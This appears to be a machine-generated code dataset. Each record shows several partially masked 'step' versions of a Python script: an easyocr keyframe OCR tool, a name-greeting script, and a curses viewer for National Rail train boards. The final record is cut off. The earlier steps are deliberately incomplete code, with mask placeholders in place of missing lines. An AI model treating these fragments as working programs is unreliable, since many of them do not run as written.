"step-4": "import easyocr\nimport cv2\nimport json\nimport numpy as np\nimport os\nimport os.path\nimport glob\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\nreaders = [easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu=\n False)]\nbasedir = 'keyframes/'\ndirs = os.listdir(basedir)\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
"step-5": "import easyocr\r\nimport cv2\r\nimport json\r\nimport numpy as np\r\nimport os\r\nimport os.path\r\nimport glob\r\n\r\ndef convert(o):\r\n if isinstance(o, np.generic): return o.item() \r\n raise TypeError\r\n\r\nreaders = [\r\n easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu = False),\r\n #easyocr.Reader(['ch_tra'], gpu = False),\r\n #easyocr.Reader(['fa'], gpu = False),\r\n #easyocr.Reader(['hi'], gpu = False), \r\n #easyocr.Reader(['ja'], gpu = False), \r\n #easyocr.Reader(['ko'], gpu = False),\r\n #easyocr.Reader(['th'], gpu = False),\r\n]\r\n\r\nbasedir = \"keyframes/\"\r\n\r\ndirs = os.listdir(basedir)\r\n\r\n\r\nfor d in dirs:\r\n\r\n outfile = 'ocr/' + d + '.json'\r\n if os.path.isfile(outfile):\r\n print(\"found \" + outfile + \", skipping\")\r\n continue\r\n \r\n files = glob.glob(basedir + d + \"/*.png\")\r\n \r\n ocr = {}\r\n\r\n for f in files:\r\n i = f.split(\"_\")[-2]\r\n img = cv2.imread(f)\r\n \r\n results = []\r\n for reader in readers:\r\n results = results + reader.readtext(img)\r\n \r\n h = list(filter(lambda result : len(result) > 2 and len(result[1]) > 0 and result[2] >= 0.1, results))\r\n \r\n if len(h) > 0:\r\n ocr[i] = h\r\n \r\n with open(outfile,'w') as f: \r\n json.dump(ocr, f, indent=1, default=convert)\r\n \r\n print(d)\r\n \r\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('Please enter your name:')
<|reserved_special_token_0|>
if user_name in names:
print('Hi there, {}!'.format(user_name))
else:
print('Who goes there?')
<|reserved_special_token_1|>
names = ['Mia', 'Francis', 'Eva']
print('Please enter your name:')
user_name = input()
if user_name in names:
print('Hi there, {}!'.format(user_name))
else:
print('Who goes there?')
<|reserved_special_token_1|>
# pick three names
names = ["Mia", "Francis", "Eva"]
# propmpt user for his/her name
print("Please enter your name:")
user_name = input()
if user_name in names:
print("Hi there, {}!".format(user_name))
else:
print("Who goes there?")
|
flexible
|
{
"blob_id": "59c33383365d10c108253f7b5a210d40718913a2",
"index": 9653,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Please enter your name:')\n<mask token>\nif user_name in names:\n print('Hi there, {}!'.format(user_name))\nelse:\n print('Who goes there?')\n",
"step-3": "names = ['Mia', 'Francis', 'Eva']\nprint('Please enter your name:')\nuser_name = input()\nif user_name in names:\n print('Hi there, {}!'.format(user_name))\nelse:\n print('Who goes there?')\n",
"step-4": "# pick three names\nnames = [\"Mia\", \"Francis\", \"Eva\"]\n\n# propmpt user for his/her name\nprint(\"Please enter your name:\")\nuser_name = input()\nif user_name in names:\n print(\"Hi there, {}!\".format(user_name))\nelse:\n print(\"Who goes there?\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
<|reserved_special_token_0|>
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
LDB_TOKEN = 'NULLTOKEN'
WSDL = (
'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
)
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.
ComplexType([xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.
String())]))
header_value = header(TokenValue=LDB_TOKEN)
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
import curses
from zeep import Client
from zeep import xsd
from zeep.plugins import HistoryPlugin
import time
from datetime import datetime
import os
LDB_TOKEN = 'NULLTOKEN'
WSDL = (
'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
)
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.
ComplexType([xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.
String())]))
header_value = header(TokenValue=LDB_TOKEN)
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
import curses
from zeep import Client
from zeep import xsd
from zeep.plugins import HistoryPlugin
import time
from datetime import datetime
import os
LDB_TOKEN = 'NULLTOKEN'
WSDL = 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
if LDB_TOKEN == '':
raise Exception("Please configure your OpenLDBWS token in getDepartureBoardExample!")
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken',
xsd.ComplexType([
xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue',
xsd.String()),
])
)
header_value = header(TokenValue=LDB_TOKEN)
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, "[A]", curses.A_BOLD)
stdscr.addstr(height - 3, 6, "Arrivals")
stdscr.addstr(height - 3, 15, "[D]", curses.A_BOLD)
stdscr.addstr(height - 3, 19, "Departures")
stdscr.addstr(height - 2, 2, "[Q]", curses.A_BOLD)
stdscr.addstr(height - 2, 6, "Quit")
stdscr.addstr(height - 2, width - 28, "Version 1.0 By RaithSphere")
stdscr.addstr(1, 2, "Train info powered by National Rail")
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, "Time", curses.A_BOLD)
stdscr.addstr(5, width - width + 15, "Destination", curses.A_BOLD)
stdscr.addstr(5, width - 25, "Plat", curses.A_BOLD)
stdscr.addstr(5, width - 15, "Expected", curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = "?"
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.location[0].locationName,
curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != "On time":
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, "Time", curses.A_BOLD)
stdscr.addstr(5, width - width + 15, "Origin", curses.A_BOLD)
stdscr.addstr(5, width - 25, "Plat", curses.A_BOLD)
stdscr.addstr(5, width - 15, "Expected", curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = "?"
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[0].locationName,
curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != "On time":
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
|
flexible
|
{
"blob_id": "302634b93725ceb9333e236021cbb64e023ff798",
"index": 2135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\n<mask token>\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-3": "<mask token>\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = (\n 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n )\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\nhistory = HistoryPlugin()\nclient = Client(wsdl=WSDL, plugins=[history])\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.\n ComplexType([xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.\n String())]))\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-4": "import curses\nfrom zeep import Client\nfrom zeep import xsd\nfrom zeep.plugins import HistoryPlugin\nimport time\nfrom datetime import datetime\nimport os\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = (\n 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n )\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\nhistory = HistoryPlugin()\nclient = Client(wsdl=WSDL, plugins=[history])\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.\n ComplexType([xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.\n String())]))\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n 